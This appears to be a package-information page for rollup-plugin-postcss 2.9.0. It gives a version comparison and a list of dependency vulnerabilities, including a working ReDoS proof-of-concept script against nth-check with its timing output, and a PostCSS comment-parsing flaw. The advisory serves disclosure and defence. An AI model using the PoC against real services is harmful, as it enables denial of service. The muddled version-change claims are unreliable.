Rollup Plugin PostCSS streamlines the integration of PostCSS into your Rollup workflows, enabling you to effortlessly process CSS files and leverage the power of PostCSS transformations within your JavaScript bundles. Version 2.9.0 refines this process, offering a slightly refined version of the previous stable release, 2.8.2. While the core functionality remains consistent, there are differences of note. The resolve dependency had a version change from 1.16.1 to 1.16.0. The rollup package has been updated from version 2.6.1 to 1.32.1. While on the surface it looks like a downgrade, version 2.6.1 was buggy. The dist section also shows differences, with version 2.9.0 having a smaller unpacked size that the earlier version.
Both versions provide a seamless development experience, allowing you to write modern CSS with features like autoprefixing, CSS Modules, and custom syntax using preprocessors like Sass, Less, and Stylus. The plugin handles the complexities of PostCSS configuration, letting you focus on styling your application. Dependencies like cssnano for CSS minification and postcss-modules for modular CSS are readily available. The plugin also includes robust source map support, making debugging a breeze. By leveraging Rollup Plugin PostCSS, developers can streamline their CSS processing, improve code maintainability, and stay up-to-date with the latest CSS features, all while staying within the familiar Rollup ecosystem.
All the vulnerabilities related to the version 2.9.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.